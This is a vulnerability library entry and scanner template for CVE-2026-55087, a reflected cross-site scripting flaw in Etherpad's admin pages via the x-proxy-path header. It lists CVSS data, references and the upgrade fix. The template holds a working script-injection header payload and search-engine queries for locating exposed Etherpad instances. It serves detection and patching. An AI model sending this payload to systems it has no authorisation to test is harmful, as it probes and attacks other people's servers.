/Vulnerability Library

Etherpad 2.1.0 <= 3.0.0 - Cross-Site Scripting

CVE-2026-55087
Early Release

Description

Etherpad versions 2.1.0 through 3.0.0 reflect the x-proxy-path request header into admin HTML, JavaScript, and CSS responses without sanitization. An attacker can abuse this behavior to inject crafted content into generated resource URLs, enabling cross-site scripting and cache poisoning scenarios.

Severity

Medium

CVSS Score

6.1

Affected Product

etherpad

Published Date

August 16, 2026

Template Author

haseeb-1698

CVE-2026-55087.yaml
id: CVE-2026-55087

info:
  name: Etherpad 2.1.0 <= 3.0.0 - Cross-Site Scripting
  author: Haseeb-1698
  severity: medium
  description: |
    Etherpad versions 2.1.0 through 3.0.0 reflect the x-proxy-path request header into admin HTML, JavaScript, and CSS responses without sanitization. An attacker can abuse this behavior to inject crafted content into generated resource URLs, enabling cross-site scripting and cache poisoning scenarios.
  remediation: |
    Upgrade to Etherpad 3.1.0 or later.
  reference:
    - https://github.com/ether/etherpad/security/advisories/GHSA-fjgc-3mj7-8rg8
    - https://github.com/ether/etherpad/commit/8c6104c5d5daf41f0d454acc04d42dffa0e0d996
    - https://nvd.nist.gov/vuln/detail/CVE-2026-55087
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-55087
    cwe-id: CWE-79,CWE-444,CWE-601
  metadata:
    verified: true
    max-request: 1
    vendor: ether
    product: etherpad
    shodan-query: http.title:"Etherpad"
    fofa-query: title="Etherpad"
  tags: cve,cve2026,etherpad,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/"

    headers:
      x-proxy-path: '/"><script>alert(document.domain)</script>'

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'src=\"/\\\"><script>alert(document.domain)</script>/admin/', 'href=\"/\\\"><script>alert(document.domain)</script>/admin/')"
          - "contains(header, 'text/html')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100e4b94e9d71895ee75bb7d43d7050fa172a16b0379a276d137a92e8e62cfec44b02200e69b2b83712c9d8c079ce8a21c62e0ad4af5d6bec0d08f87fad3ec2c7cb6279:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-55087
CWE ID:
cwe-79, cwe-444, cwe-601

References

https://github.com/ether/etherpad/security/advisories/GHSA-fjgc-3mj7-8rg8https://github.com/ether/etherpad/commit/8c6104c5d5daf41f0d454acc04d42dffa0e0d996https://nvd.nist.gov/vuln/detail/CVE-2026-55087

Remediation Steps

Upgrade to Etherpad 3.1.0 or later.